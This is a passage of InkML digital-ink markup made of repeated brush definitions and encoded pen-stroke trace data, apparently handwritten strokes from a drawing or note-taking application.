4-180,48 1-1052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16.100"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'2'0'0,"1"1"0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,1 4 0,24 38 0,-18-24 0,-1 0 0,-1 1 0,0 0 0,-2 0 0,0 0 0,3 43 0,-8 136 0,-2-95 0,2-25 0,0-61 0,0-55 0,-1 12 0,2 0 0,0 0 0,2 0 0,0 0 0,2 1 0,1-1 0,12-33 0,-9 35 0,-6 14 0,0 0 0,1 0 0,0 0 0,0 0 0,1 0 0,-1 1 0,11-12 0,44-55 0,-43 51 0,1 2 0,32-33 0,-42 48 0,-1 1 0,1-1 0,0 1 0,1 1 0,-1-1 0,1 1 0,0 1 0,0-1 0,0 2 0,0-1 0,1 1 0,13-2 0,-14 2 0,0 1 0,0 0 0,0 1 0,-1 0 0,1 0 0,0 1 0,0 0 0,0 0 0,0 1 0,-1 0 0,1 1 0,-1-1 0,1 1 0,-1 1 0,0-1 0,0 1 0,-1 0 0,10 8 0,11 15 0,30 41 0,-48-58 0,-1 1 0,-1-1 0,0 2 0,0-1 0,-1 1 0,-1 0 0,0 1 0,0-1 0,-1 1 0,-1 0 0,0 0 0,1 23 0,-5 46-10,-1-61-216,2 0 0,0 0 0,1 0 1,1 0-1,8 36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18.643"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">28 0 24575,'0'906'0,"-1"-893"0,-1 1 0,0-1 0,-7 23 0,6-28 0,0 0 0,1 1 0,0-1 0,0 1 0,1-1 0,1 1 0,-1 0 0,1-1 0,1 1 0,-1 0 0,4 12 0,-3-19 4,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0-1 0,0 1 0,1-1 0,-1 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1-1 0,5 1 0,6 1-208,1-1 1,0 0-1,14-2 0,-16 0-439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20.485"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 58 24575,'33'-1'0,"63"-12"0,-63 7 0,60-3 0,-69 8 0,-1-2 0,31-6 0,-29 3 0,47-2 0,299 7 85,-177 2-1535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22.640"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">626 32 24575,'0'-1'0,"0"0"0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-2 0 0,-30-7 0,30 7 0,-46-4 0,1 2 0,-82 6 0,124-4 0,1 1 0,-1 0 0,1 1 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 0 0,0 1 0,0 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,-4 7 0,-1 2 0,1 1 0,0 0 0,1 0 0,-7 16 0,7-13 0,0-2 0,-1 1 0,-19 24 0,19-26 0,0 0 0,1 0 0,0 1 0,1 0 0,1 1 0,-6 15 0,-3 10 0,5-18 0,-44 117 0,50-123 0,1-1 0,0 1 0,1 0 0,0 1 0,2-1 0,0 0 0,1 0 0,0 0 0,1 1 0,1-1 0,1-1 0,6 19 0,-8-30 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0-1 0,1 0 0,0 0 0,-1 0 0,1 0 0,6 0 0,10 1 0,0-1 0,0-1 0,22-3 0,-9 1 0,33 2 0,39-3 0,-98 2 0,0-1 0,0 0 0,0-1 0,0 0 0,0 0 0,0 0 0,-1-1 0,0 1 0,0-2 0,0 1 0,6-6 0,-3 2 0,0 0 0,-1 0 0,-1-1 0,1 0 0,-1-1 0,7-12 0,32-96 0,-46 117 0,10-17 0,0-1 0,-2-1 0,0 0 0,-1 0 0,-2 0 0,0-1 0,4-29 0,-8 38 0,0-1 0,1 1 0,6-20 0,-7 29 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,2-1 0,-3 2 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,-1 0 0,2 0 0,0 2 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 5 0,5 45 0,-2-7 0,0-25 0,16 57 0,-17-71 0,-1-1 0,1 1 0,0-1 0,1 1 0,-1-1 0,1 0 0,0-1 0,10 11 0,-1-3 0,0 2 0,0-1 0,-2 2 0,0-1 0,0 1 0,-2 1 0,12 27 0,-1-8-1365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23.557"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'2'0'0,"1"0"0,-1 1 0,1-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,2 4 0,2 7 0,0 1 0,0-1 0,2 19 0,-5-23 0,0 0 0,9 33 0,-2 1 0,-2 1 0,3 66 0,-9-79 0,11 57 0,-6-54 0,2 36 0,-13-45 0,0-20 0,-2-15 0,-23-69-1365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24.017"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'0'5'0,"0"6"0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25.849"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'4'0'0,"1"1"0,-1 0 0,0-1 0,1 2 0,-1-1 0,0 0 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,-1 0 0,1-1 0,-1 1 0,0 0 0,5 6 0,4 7 0,0 0 0,16 31 0,-13-23 0,-9-10 0,1 0 0,-2 1 0,0-1 0,-1 1 0,0 0 0,2 25 0,3 13 0,-4-25 0,-2 1 0,0 0 0,-4 49 0,2 30 0,12-39 0,-8-51 0,-1 0 0,1 19 0,-4 120 0,-3-229 0,0 30 0,2 1 0,8-77 0,-3 102 0,0 0 0,0 0 0,2 1 0,13-25 0,14-31 0,-27 54 0,0 0 0,2 1 0,11-17 0,16-31 0,-27 47 0,0 0 0,1 0 0,0 1 0,17-18 0,-23 29 0,1 0 0,0 1 0,1 0 0,-1 0 0,1 0 0,0 1 0,0 0 0,0 0 0,0 0 0,7-2 0,-10 4 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0 0 0,1-1 0,-1 1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,4 3 0,107 128 0,-102-117 0,-1 1 0,13 28 0,-3-6 0,-12-27 0,-1 1 0,-1 0 0,0 0 0,-1 1 0,-1 0 0,0 0 0,-1 0 0,0 0 0,-1 0 0,0 25 0,-4 216-1365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28.714"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">202 739 24575,'1'-1'0,"-1"0"0,0 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,1 1 0,32-10 0,-10 4 0,-18 2 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,-1 0 0,0 0 0,0-1 0,-1 0 0,6-10 0,-4 7 0,0 0 0,1 1 0,12-15 0,3 2 0,1 1 0,-2-2 0,20-25 0,-34 39 0,-1 0 0,0 0 0,0-1 0,-1 0 0,0 0 0,-1 0 0,0 0 0,0 0 0,-1-1 0,2-14 0,0-38 0,-3-1 0,-8-64 0,7 121 0,-1 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,0-1 0,0 1 0,-6-8 0,6 10 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 1 0,0 0 0,0-1 0,0 2 0,-1-1 0,1 0 0,-1 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,-9 1 0,-127 1 0,53 2 0,81-3 0,0 0 0,0 1 0,0 0 0,0 0 0,0 0 0,0 1 0,0 0 0,1 1 0,-1-1 0,1 1 0,-1 1 0,1-1 0,0 1 0,0 0 0,1 0 0,-1 1 0,1-1 0,0 1 0,0 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0 0 0,1 1 0,0-1 0,0 1 0,1-1 0,0 1 0,0 0 0,0 0 0,0 9 0,-3 30 0,2 1 0,5 74 0,1-28 0,-5 19 0,5 114 0,-1-211 0,1-1 0,1 0 0,0 0 0,1 0 0,9 18 0,4 12 0,-13-33 0,1-1 0,0 0 0,0 0 0,1-1 0,1 0 0,-1 0 0,1-1 0,1 1 0,-1-2 0,19 13 0,-7-10 0,0-1 0,0-1 0,41 10 0,-1 0 0,-43-13 0,0-1 0,0-1 0,1-1 0,-1 0 0,18-1 0,-15-1 0,0 1 0,1 1 0,22 6 0,-21-3-1365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30.249"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'1'5'0,"1"0"0,-1 0 0,1 0 0,0 0 0,4 8 0,3 8 0,0 3 0,1-1 0,1 0 0,27 41 0,-32-51 0,0 0 0,-1 0 0,0 1 0,-1 0 0,5 27 0,6 24 0,24 80 0,-31-107 0,-3-11 0,-2 0 0,0 0 0,-2 0 0,-3 28 0,3 52 0,0-97 0,0 1 0,1-1 0,1 0 0,0 0 0,7 19 0,-7-28 0,-1-8 0,0-9 0,-3-103 0,-1 80 0,2-1 0,1 0 0,12-65 0,-6 71 0,-4 13 0,2 0 0,0 0 0,2 1 0,0-1 0,14-26 0,-18 42 0,1 0 0,-1 1 0,1-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 1 0,0 1 0,7-4 0,10-3 0,43-10 0,-2 1 0,1-2-1365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42.952"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1506 24575,'2'-5'0,"0"0"0,-1 1 0,2-1 0,-1 0 0,0 1 0,1 0 0,0 0 0,5-6 0,1-3 0,15-23 0,-7 12 0,-1-1 0,-2 0 0,0-1 0,13-36 0,-19 40 0,0 0 0,2 1 0,1 0 0,0 0 0,2 1 0,28-35 0,-9 18 0,-2-2 0,-1-1 0,39-74 0,-38 37 0,-21 50 0,25-48 0,-25 55 0,-1 0 0,-1 0 0,-1-1 0,6-26 0,-7 24 0,23-136 0,0 6 0,-6 24 0,-21 123 0,1-1 0,-2 0 0,1 0 0,-1 1 0,0-12 0,0 18 0,0-1 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-2-1 0,1 1 0,0 0 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,0-1 0,-1 3 0,-11 9 0,0-1 0,-1-1 0,-1 0 0,1-1 0,-1 0 0,-29 11 0,31-15 0,1 1 0,0 0 0,0 1 0,0 1 0,-13 10 0,-11 8 0,28-21 0,1 1 0,0 1 0,1-1 0,-1 1 0,-7 11 0,9-11 0,0-1 0,-1 1 0,0-1 0,0 0 0,-1 0 0,1-1 0,-10 6 0,-27 12-1365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1:42.198"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2"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43.932"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'9'0'0,"-1"2"0,1-1 0,-1 1 0,1 0 0,-1 1 0,16 7 0,46 27 0,-28-11 0,-27-15 0,2 0 0,0-2 0,0 0 0,18 6 0,-17-8 14,-1 1 0,0 1 0,-1 1 0,20 14 0,13 8-1449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48.184"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">597 140 24575,'0'-6'0,"0"0"0,0 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,-1 0 0,0 1 0,0-1 0,0 1 0,-4-7 0,4 9 0,-1 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,-5 0 0,-44-4 0,36 5 0,0-1 0,-27-6 0,29 2 0,-1 2 0,0 0 0,0 1 0,0 1 0,-20 0 0,29 2 0,0 0 0,0 0 0,0 0 0,1 1 0,-1 0 0,1 0 0,-1 1 0,1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,1 0 0,-9 9 0,-8 8 0,1-1 0,0 1 0,-25 33 0,39-42 0,0 0 0,1 1 0,0-1 0,1 1 0,1 1 0,0-1 0,0 0 0,-2 24 0,4-9 0,0 0 0,2 0 0,3 37 0,-1-57 0,-1 0 0,1 0 0,0 0 0,1 0 0,-1 0 0,2-1 0,-1 1 0,1-1 0,9 13 0,-10-15 0,0-1 0,1 0 0,-1 0 0,1-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1-1 0,0-1 0,0 1 0,7 0 0,32 2 0,0-2 0,57-5 0,-8 0 0,-80 3 0,1 0 0,-1-1 0,0-1 0,25-5 0,-33 5 0,0 1 0,-1-2 0,1 1 0,0 0 0,-1-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,-1-1 0,1 1 0,0-1 0,-1 0 0,0 0 0,4-8 0,-2 3 0,0-1 0,0 0 0,-1 0 0,-1-1 0,0 1 0,0-1 0,1-13 0,-1-5 0,-2-39 0,0-13 0,0 74 0,0 0 0,0 0 0,1 1 0,-1-1 0,2 0 0,-1 1 0,1-1 0,3-5 0,-5 10 0,-1 1 0,1-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 1 0,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,-1 0 0,2 1 0,6 5 0,0 1 0,-1 0 0,0 1 0,0 0 0,-1 0 0,0 0 0,0 1 0,-1 0 0,0 1 0,4 12 0,-3-8 0,1-1 0,1 1 0,0-2 0,15 19 0,72 65-1365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49.195"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'1130'0'0,"-1105"1"0,-1 2 0,0 1 0,0 0 0,44 16 0,-63-18 0,0 0 0,0 1 0,0-1 0,-1 1 0,8 5 0,-12-8 0,1 1 0,0-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 0 0,1 0 0,-3 1 0,-16 3-1365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0.835"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'0'905'0,"0"-890"0,1 1 0,1-1 0,1 1 0,0-1 0,1 0 0,9 25 0,-11-35 0,0 1 0,0-1 0,1 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,0 0 0,0 1 0,1-1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1-1 0,7 2 0,101 23-1365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1.844"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 30 24575,'72'1'0,"81"-3"0,-84-11 0,-51 9 0,0 0 0,21-1 0,280 2 66,-164 5-1497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2.995"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">29 0 24575,'0'425'0,"-2"-404"0,0 0 0,-9 38 0,6-36 0,1 0 0,-1 27 0,6 232 0,-1-270 0,0-1 0,1 0 0,1 0 0,0 0 0,4 13 0,-5-21 0,0 1 0,0-1 0,1 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,1-1 0,0 0 0,0 0 0,-1 0 0,2 0 0,-1 0 0,0 0 0,4 0 0,13 4 0,-14-4 0,0-1 0,0 1 0,0 0 0,0 1 0,0-1 0,-1 1 0,1 0 0,-1 1 0,0-1 0,7 7 0,-7-5 10,1 0 0,0-1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,1 0 0,0-1 0,0 0 0,11 3 0,2-2-505,0-2 0,39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5.238"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">118 152 24575,'1'0'0,"0"0"0,0-1 0,0 1 0,-1-1 0,1 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,1 0 0,-1-1 0,-1 1 0,-2 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,-1 0 0,1 1 0,1-1 0,-6 5 0,3-2 0,-1 0 0,1 1 0,0 0 0,0 0 0,1 0 0,-8 13 0,9-8 0,-1 0 0,2 1 0,-1-1 0,2 1 0,-1 0 0,1 0 0,1-1 0,0 1 0,1 0 0,1-1 0,-1 1 0,2 0 0,-1-1 0,2 0 0,5 15 0,-4-17 0,1 0 0,0 0 0,0-1 0,1 1 0,0-1 0,9 8 0,9 10 0,-12-14 0,0 0 0,1-1 0,1 0 0,27 15 0,-34-22 0,1 0 0,0-1 0,1 0 0,-1 0 0,1-1 0,-1 0 0,1 0 0,15-1 0,3 0 0,48-6 0,-73 5 0,1-1 0,-1 0 0,1 1 0,-1-2 0,1 1 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,-1-1 0,1 0 0,-1 1 0,0-1 0,0 0 0,1-4 0,3-6 0,0 0 0,-2 0 0,1-1 0,1-15 0,2 0 0,1-9 0,4-39 0,-2 9 0,-7 37 0,1-62 0,-2 19 0,-3 72 0,0-1 0,0 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,3-2 0,-4 3 0,0 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 1 0,15 13 0,0 9 0,-1 1 0,-1 1 0,14 36 0,-15-36 0,0-1 0,29 39 0,-26-41 0,-1 1 0,-1 0 0,11 26 0,-18-33 0,1-1 0,1 1 0,0-1 0,21 25 0,53 48 0,-80-86 0,17 12 0,-10-10 0,-10-4 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0-1 0,-2-1-1,0 0 0,0-1 0,0 1 1,0 0-1,-1 0 0,1 0 0,0 0 0,-1 0 0,0 1 0,1-1 0,-1 1 0,0 0 0,0 0 0,-5-2 0,-9-4-1350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5.931"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">209 0 24575,'0'5'0,"-5"1"0,-6 0 0,-2 4 0,-2 0 0,0 3 0,-2-1 0,-3-1 0,-2-4 0,-3-3 0,4 4 0,-1-1 0,0 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8.181"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">627 29 24575,'0'-1'0,"0"0"0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,-1-1 0,-30-5 0,29 6 0,-56-4 0,-69 4 0,58 1 0,61 0 0,0-1 0,1 1 0,-1 1 0,0 0 0,1 0 0,-1 1 0,1 0 0,0 0 0,-8 5 0,-8 6 0,-34 26 0,8-5 0,44-32 0,0 1 0,0-1 0,1 1 0,-1 0 0,1 1 0,0-1 0,0 1 0,1 0 0,-1 1 0,1-1 0,0 1 0,1-1 0,-1 1 0,1 0 0,0 1 0,1-1 0,-1 0 0,1 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,1 9 0,-3 24 0,3 1 0,1 0 0,2-1 0,2 0 0,1 0 0,24 76 0,-23-95 0,-5-14 0,-1-1 0,2 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0-1 0,1 1 0,0-1 0,9 9 0,12 8 0,1-1 0,1-2 0,35 20 0,-47-30 0,-2 1 0,1 1 0,15 16 0,-18-16 0,2 0 0,-1-1 0,24 15 0,-27-19-114,31 12 362,-38-17-323,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,-1 0 0,1 0 0,2-1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59.162"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'1'4'0,"0"0"0,0-1 0,0 1 0,1-1 0,-1 0 0,1 1 0,0-1 0,0 0 0,4 5 0,7 12 0,45 84 0,-43-76 0,-2 0 0,-1 1 0,-1 1 0,7 31 0,11 92 0,-23-108 0,-1 1 0,-2 0 0,-6 77 0,1-27 0,0 2 0,5 114 0,10-144 0,-9-50 0,0-1 0,1 22 0,-4-29 0,-1-7 0,0 1 0,0-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,1-1 0,-1 0 0,4 7 0,-4-10 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,4-20 0,-1-32-1365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6:22.521"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
